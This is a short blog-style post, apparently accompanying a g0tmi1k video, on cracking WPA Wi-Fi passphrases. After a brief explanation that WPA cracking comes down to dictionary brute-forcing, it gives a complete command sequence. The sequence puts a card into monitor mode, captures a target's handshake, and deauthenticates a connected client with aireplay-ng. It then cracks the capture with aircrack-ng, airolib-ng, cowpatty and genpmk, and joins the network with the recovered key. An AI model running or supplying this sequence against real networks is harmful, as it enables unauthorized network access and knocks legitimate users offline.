Credits to g0tmi1k. This video goes beyond just cracking wpa, it also shows how the different tools perform. This video explains the methodology really simple. Let me say that cracking WPA is not like cracking WEP, in WEP you’re exploiting a vulnerability in the way the encryption algorithm is implemented, but in WPA the only vulnerability will be in the strength of the user passphrase. Yes you’ve guessed it, when cracking WPA basically what you’re doing is brute-forcing the user password, in other words the success of your attack will depend on your dictionary or password list. If the user’s passphrase is not in your dictionary, you will never crack the WPA key. There are several types of WPA dictionary list out there, but I highly recommend using rainbow-tables which can be several Gigs in size. How to find them?… Google is your friend!
Download Metasploit : Click Here
airmon-ng start wlan0 airodump-ng mon0 airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0 aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0 aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt airolib-ng crackwpa --import essid essid airolib-ng crackwpa --stats airolib-ng crackwpa --clean all airolib-ng crackwpa --batch airolib-ng crackwpa --verify all aircrack -r crackwpa output-01.cap cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash wpa_passphrase g0tmi1k precivilization > wpa.conf wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf dhclient -r dhclient wlan0 ping 192.168.1.1